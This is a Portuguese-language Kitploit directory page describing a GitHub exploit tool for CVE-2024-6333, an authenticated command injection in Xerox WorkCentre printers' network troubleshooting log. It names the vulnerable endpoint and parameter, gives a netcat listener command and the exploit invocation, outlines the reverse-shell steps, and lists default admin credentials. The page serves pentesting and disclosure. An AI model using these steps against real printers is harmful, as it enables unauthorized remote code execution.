Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-6333 — Vulnerabilidade de execução remota de código autenticada em impressoras Xerox WorkCentre por meio do recurso de log de solução de problemas de rede. | Kitploit
Ferramentas/GitHubGitHub/0xqrx/cve-2024-6333
Segurança de Sistemas EmbarcadosExploraçãoExploração de Aplicações WebTestes de PenetraçãoSegurança de Hardware e IoT
GitHub0xqrx/cve-2024-6333

CVE-2024-6333

Vulnerabilidade de execução remota de código autenticada em impressoras Xerox WorkCentre por meio do recurso de log de solução de problemas de rede.

Ver Repositório
6há 7 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-6333 - Execução Remota de Código Autenticada da Xerox

Vulnerabilidade de execução remota de código autenticada em impressoras Xerox WorkCentre por meio do recurso de Log de Solução de Problemas de Rede.

Descrição

A funcionalidade de Log de Solução de Problemas de Rede (/properties/security/network_troubleshooting_log.php) não sanitiza o parâmetro do servidor de destino (security.nwtroubleshoot.destination.server), permitindo que um administrador autenticado injete comandos arbitrários do sistema operacional. Quando a captura do log de rede é iniciada, o payload injetado é executado como um comando shell, resultando em execução remota de código.

Produtos Afetados

  • XEROX WorkCentre 6655 (testado no firmware 073.110.019.14200)
  • Vários outros modelos de impressoras Xerox (consulte o comunicado)

Referências

  • https://sec-consult.com/vulnerability-lab/advisory/authenticated-remote-code-execution-in-multiple-xerox-printers/
  • https://nvd.nist.gov/vuln/detail/CVE-2024-6333

Requisitos

  • Python 3
  • Credenciais de administrador válidas na impressora de destino
  • Acesso de rede ao destino

Instalação

root@kitploit:~
pip install -r requirements.txt

Uso

Inicie um listener na sua máquina:

root@kitploit:~
nc -lvnp 8443

Execute o exploit:

root@kitploit:~
python3 CVE-2024-6333.py --target https://<PRINTER_IP> --lhost <YOUR_IP> --lport 8443

Argumentos

Como Funciona

  1. Autentica na interface web da impressora usando as credenciais fornecidas
  2. Interrompe quaisquer sessões de log de solução de problemas de rede existentes
  3. Injeta um payload de reverse shell no campo do servidor de destino
  4. Aciona a captura do log de rede, executando o payload
  5. Aguarda 30 segundos e, em seguida, envia um comando de limpeza/parada

Aviso Legal

Esta ferramenta é fornecida apenas para testes de segurança autorizados e fins educacionais. O acesso não autorizado a sistemas de computador é ilegal.

Baixar ferramenta
ArgumentoObrigatórioPadrãoDescrição
--targetSimURL de destino (ex.: https://192.0.2.1)
--lhostSimEndereço IP do listener
--lportNão8443Porta do listener
--userNãoadminNome de usuário do administrador
--passwordNão1111Senha do administrador
--proxyNãoURL do proxy (ex.: http://127.0.0.1:8080)